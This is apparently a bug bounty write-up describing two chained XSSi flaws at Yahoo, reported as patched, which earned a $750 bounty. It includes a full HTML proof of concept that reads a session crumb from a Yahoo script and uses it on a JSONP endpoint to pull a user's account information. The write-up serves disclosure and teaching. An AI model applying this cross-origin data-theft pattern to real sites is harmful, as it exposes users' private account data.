Yahoo — Two XSSi vulnerabilities chained to steal user information. ($750 Bounty)

While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn’t valid it would return the following response:

At this point I realized that if I could somehow steal the victims valid .crumb value, I could successfully steal information about their account. I then searched all requests I intercepted in Burp Suite for my valid crumb and I quickly found it in in a dynamic Javascript file located at: https://messenger.yahoo.com/embed/app.js

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people that don’t understand how XSSi works the vulnerability essentially takes advantage of Same-Origin Policy (SOP) not being applied to Javascript src attribute within the script tag. I then created the following Proof of Concept which steals the valid .crumb value from the dynamic Javascript file at https://messenger.yahoo.com/embed/app.js and then places the valid crumb in the .crumb GET parameter as seen here https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx. which returns a proper response containing information about the user. Using the code below I was able to extract information:

<html>
    <head>
        <title>Yahoo XSSi PoC</title>
    </head>
    <body>        
        <div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">
            <h1 style="text-align: center;">Proof of Concept</h1>
            <b>Dataset 1:</b>
            <div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
            <br/>
            <b>Dataset 2:</b>
            <div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
        </div>
        <script>
            function processDeviceUsers(data) { 
                document.getElementById("content1").innerHTML = JSON.stringify(data);
            }
            window.onload = function () {
                var config = {};
                config_data = {};
                config.merge = function(data) { config_data = data };
                iris.initConfig(config);
                document.getElementById("content2").innerHTML =  JSON.stringify(config_data); 
                var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;
                var s = document.createElement('script');
                s.setAttribute('src', src);
                document.body.appendChild(s);
            }    
        </script>
        <script src="https://messenger.yahoo.com/embed/app.js"></script>
        <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    </body>
</html>

Below is a screenshot of the payload I submitted to Yahoo and received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write up.